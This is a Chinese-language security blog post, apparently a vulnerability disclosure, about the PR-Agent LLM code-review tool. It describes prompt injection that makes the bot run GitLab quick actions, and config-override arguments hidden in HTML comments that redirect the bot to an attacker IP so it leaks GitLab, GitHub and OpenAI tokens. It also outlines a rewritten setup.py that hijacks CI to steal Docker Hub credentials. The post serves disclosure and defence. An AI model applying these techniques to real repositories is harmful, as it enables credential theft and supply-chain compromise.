引言
当前存在一股将LLM应用于软件工程各个方面的推动力,其范围远超仅仅生成代码片段。这种推动包括与代码仓库和构建系统的集成。不幸的是,当用于构建、管理和部署软件的系统出现漏洞时,可能会带来毁灭性后果。在这篇博客文章中,我们描述了在一个名为PR-Agent的开源LLM应用中发现的多处漏洞,以及它们如何影响使用该工具的项目。
什么是PR-Agent
PR-Agent是一个开源工具,通过使用AI为开发者提供反馈和建议,帮助审查和处理git拉取请求。它特别能够:
- 总结或解释拉取请求
- 回答关于拉取请求的问题
- 改进拉取请求
这是一个有用的工具,开发者可以使用它来帮助他们理解从贡献者那里收到的拉取请求。
PR-Agent支持多个git提供商,包括GitHub、GitLab和BitBucket。它可以配置为自动向新的拉取请求添加AI生成的描述。此外,用户通常可以在所有这些git提供商平台上对拉取请求撰写评论。如果这样的评论包含PR-Agent命令,PR-Agent将检测并执行该命令。以下是PR-Agent支持的一些示例命令:
-
/ask: 回答关于此拉取请求的问题 示例用法:/ask 这个PR是做什么的? -
/improve: 提供改进此PR的建议 示例用法:/improve
在上述两种情况下,PR-Agent将读取评论,确定是否有已知命令要执行,如果有,则生成响应并将其作为另一个评论发布到该拉取请求上。
提示注入
当使用/ask命令时,PR-Agent通过直接将/ask后的文本插入到其向LLM的提示中来构建提示。这为提示注入打开了大门。因此,可以操纵PR-Agent撰写包含用户控制内容的PR评论。
起初这可能看起来不是问题。但让我们考虑一个在公共Gitlab实例(如gitlab.com)上的公共项目,并假设PR-Agent已为该项目设置。在这种情况下,PR-Agent需要有一种手段来认证并在该Gitlab实例上作为新的PR评论发布响应。这通常通过使用Gitlab访问令牌来实现,该令牌带有一些相关权限和角色。
现在,不是该公共项目成员的用户仍然可以在公共项目的PR上撰写评论,并触发PR-Agent用另一个包含用户控制内容的评论进行回复,如上所述。但由于PR-Agent撰写该评论,它是使用PR-Agent配置使用的访问令牌的权限完成的。同样,到目前为止这看起来并不太糟糕,因为它只是写一个评论,对吧?
Gitlab快速操作
事实证明,Gitlab有一个称为快速操作的功能,这是Gitlab用户通过发布包含以斜杠开头的命令的评论来执行某些操作的一种方式,类似于PR-Agent命令。有些快速操作只能在某些上下文中执行,例如/merge仅对拉取请求有意义,不能在问题上使用。
通过利用PR-Agent中的提示注入漏洞,可以通过PR-Agent发布的评论执行Gitlab快速操作,使用可能提升的权限,如PR-Agent使用的访问令牌中所包含的。这是一种权限提升形式,我们可以像PR-Agent一样行动。实际上,此令牌至少具有Reporter角色,这是首先撰写评论所必需的。但如果此访问令牌具有开发者甚至维护者角色,这可能变得更加严重。我们发现可以使用提升的权限执行以下快速操作:
/approve: 批准MR。在Gitlab术语中,我们谈论合并请求(MR),但它与拉取请求(PR)相同。编写/approve与点击合并请求上的“批准”按钮具有相同效果。请注意,批准MR与合并MR不同。实际上,Gitlab项目可能配置为不允许合并MR,除非至少一定数量的开发者已批准它。/rebase: 将最新目标分支提交变基到源分支/assign @user1 @user2: 分配一个或多个用户给此MR/title <新标题>: 更改此MR的标题/close: 关闭此MR/lock: 锁定讨论,仅允许特权用户评论MR/target_branch <分支>: 更改此MR应合并到的目标分支 以及其他一些快速操作,例如添加标签等。
我们发现无法通过PR-Agent触发/merge快速操作,因为此Gitlab快速操作需要一个名为merge_request_diff_head_sha的参数(MR源分支的最新git提交的SHA哈希)在发布Gitlab评论的Github API HTTP请求中作为参数传递。由于PR-Agent从不发送该参数,我们只能操纵评论的内容,因此无法触发/merge快速操作。即使我们让PR-Agent撰写包含/merge的评论,也不会发生任何事情。当常规用户点击“合并”按钮时起作用的原因是该参数插入在页面的HTML中,因此在点击按钮时发送。这对常规用户是透明的。
尽管/merge不能以这种方式触发,我们可以强调仍然可以:
- 更改合并请求的标题
- 关闭它们
- 更改它们的目标分支
- 并批准它们
仅举几个不应可能的操作。
寻找更多漏洞
我们没有就此止步,继续寻找PR-Agent中的其他漏洞。在测试/update_changelog PR-Agent命令时,我们注意到可以通过PR-Agent命令传递配置选项,如在此PR-Agent响应中所示:
PR-Agent从其配置中读取配置。toml文件及其机密。secrets.toml。两个文件都包含键/值对列表,分组到部分中。当PR-Agent解释命令时,它将文本拆分为单词,如果一个单词具有--some.key=some_value的形式,则将其配置中的some.key的值更改为some_value。这在评论中向PR-Agent命令传递一些选项很有用。
然而,我们可以滥用此功能覆盖一些敏感选项。让我们看看这是如何工作的。
API密钥泄漏
PR-Agent可以配置为使用特定的git提供商和特定的LLM提供商。配置和机密文件应包含类似以下的行:
|
|
现在想象我们使用GitLab实例和Azure OpenAI。我们将配置gitlab.url指向我们的Gitlab实例。如果我们使用gitlab.com,这将是https://gitlab.com,但如果我们使用自托管的Gitlab实例,我们将在那里插入其URL。对于Azure OpenAI,我们必须指定openai.api_base与我们的Azure OpenAI基本URL。
要泄漏这些秘密API密钥,设置相当简单:
- 我们设置一个我们控制的Web服务器,使其在公共IP地址(例如1.2.3.4)上的TCP端口80监听。
- 我们在使用PR-Agent的目标git仓库的拉取请求上撰写评论,包含以下文本(注意使用HTML注释,以便在渲染评论时对用户不可见,但仍然被PR-Agent拾取):
|
|
这强制PR-Agent覆盖其gitlab.url值到我们服务器的IP地址,并连接到我们的服务器而不是配置文件中配置的Gitlab实例,并将凭据发送到那里。
3. 然后我们查看在1.2.3.4服务器上收到的HTTP请求,并在Authorization头中收集访问令牌。
|
|
我们看到这里的秘密令牌是ssiCHTtjxAFMW-sFyry6。
相同的技术可以应用于泄漏这些其他秘密值:
-
通过覆盖
--github.base_url=1.2.3.4:80- 如果PR-Agent通过Github操作使用,则Github操作生成的Github访问令牌(GITHUB_TOKEN)
- 如果PR-Agent通过Github应用使用,则Github应用JWT API令牌
-
通过覆盖
--openai.api_base=1.2.3.4:80- Azure OpenAI密钥
- OpenAI密钥
请注意,如果PR-Agent配置了Azure OpenAI,这也会泄漏部署名称,例如gpt4。我们唯一需要猜测的是实际的基本URL。例如:https://SOME_NAME_TO_GUESS.openai.azure.com/但这比猜测API密钥更容易。如果配置直接使用OpenAI,那么没有什么可猜测的,我们可以立即使用API密钥。
可能还有更多秘密可以泄漏,例如BitBucket访问令牌,但我们没有测试这一点。
写入公共GitHub仓库
我们想更进一步,调查PR-Agent的部署选项。在阅读官方文档时,我们看到在GitHub上安装PR-Agent的第一个选项是通过设置GitHub操作。文档提供了一个示例YAML文件来设置此GitHub操作:
|
|
注意有一个权限部分。此部分定义了给予GITHUB_TOKEN访问令牌的权限。根据GitHub文档,此令牌由GitHub为GitHub操作中的每个作业自动生成,并在作业完成时或最多24小时后过期。我们还看到上面的示例YAML文件给予此令牌内容范围的写入权限。这意味着我们可以使用此令牌对GitHub仓库执行写入操作,例如:
- 在git仓库上插入/编辑/删除文件
- 发布新的GitHub版本
要利用这一点,我们只需要在GitHub操作完成之前执行我们的写入操作。为此,我们可以在1.2.3.4设置一个Web服务器来处理HTTP请求并提取GITHUB_TOKEN,并立即使用它进行认证并向GitHub API发出另一个请求以对git仓库执行一些恶意写入操作。例如,这可以用于将恶意软件插入公共git仓库。
请注意,GitHub的权限系统相当精细,即使内容范围提供对仓库的写入访问,也有一个例外。如果没有工作流范围的写入权限,则无法写入.github/workflows目录。这意味着我们无法添加另一个GitHub操作,该操作发出包含仓库机密的HTTP请求并将这些机密泄漏到我们的1.2.3.4服务器,例如。能够写入git仓库本身已经很糟糕,但能够泄漏机密会更好。
泄漏GitHub仓库机密
如果一个项目使用PR-Agent作为GitHub操作,它可能也将GitHub操作用于其他目的。例如,在某些公共仓库上构建、测试或发布新版本的软件。常见的例子包括将Docker镜像推送到Docker Hub,将Rust库发布到crates.io或将Python库发布到PyPi。
为此,需要凭据,并且建议将这些凭据存储为Github仓库机密,可以在GitHub操作中使用。
要泄漏这些机密,我们需要某种方式将命令注入GitHub操作并使其运行。
提交包含GitHub操作之一更改的拉取请求将不起作用,因为在这种情况下机密将是空白的,除非项目所有者故意启用了不安全的项目选项。
让我们考虑freeverseio/laos GitHub项目,它通过Github操作使用PR-Agent。并查看其构建工作流中的build_and_push作业:
|
|
此操作每次推送git提交或手动触发workflow_dispatch事件时运行。配置Github操作在workflow_dispatch上运行很常见,因为然后会出现一个按钮,开发者可以在需要时单击以手动触发工作流。让我们看看此GitHub操作的作用。
首先,它通过重用现有的actions/checkout操作克隆git仓库。然后,它使用cargo build构建项目。接下来,它通过docker/login-action操作登录到Docker Hub,使用这两个机密:
secrets.DOCKER_USERNAME和secrets.DOCKER_TOKEN
最后,它使用另一个可重用操作构建并将新构建的镜像推送到Docker Hub。工作流在此之前和之后做其他事情,但这是我们感兴趣的部分。
对于我们的PoC,我们将原始代码剥离为最小工作示例,并将Rust构建步骤替换为Python构建步骤以使其更易于阅读。但请注意,我们也可以通过编写仓库根目录下的build.rs文件来利用项目,该文件将在构建时执行。另请注意,如果项目使用其他构建工具或编程语言,可能有一个类似的构建时代码执行机制,可以通过在仓库中写入.github/workflows目录之外的文件来触发。这是我们的简化版本:
|
|
由于我们可以写入.github/workflows目录之外的仓库,我们可以修改setup.py以执行任意代码,这将在GitHub操作运行时运行。
泄漏Docker Hub凭据的想法如下:
- 启动mitmdump以在1.2.3.4服务器上的TCP端口443监听。这将用于收集Docker Hub机密凭据
- 复制mitmproxy/mitmdump创建的X.509证书
- 准备一个恶意的
setup.py文件,它将替换仓库中的setup.py,其中包含我们在上述步骤中复制的证书,具有以下内容:
|
|
此脚本将由构建工作流执行,将我们的mitmproxy证书安装到信任存储中,以便由docker/login-action Github操作执行的docker login命令信任我们的1.2.3.4服务器。然后它在/etc/hosts中写入这些条目,以便docker login连接到我们的服务器而不是Docker Hub:
|
|
由于build_and_push作业首先运行构建步骤,我们可以在docker login被docker/login-action操作调用之前设置所有这些。当发生时,我们可以简单地在1.2.3.4服务器上的HTTP请求头中收集凭据。
为了使所有这些一起工作,请记住我们需要在GitHub操作运行时写入我们的setup.py文件。这可以通过编写一个小程序来实现,该程序从请求中提取GITHUB_TOKEN,并立即调用GitHub API来写入我们的恶意版本的setup.py。
现在,唯一缺失的部分是触发构建工作流的运行。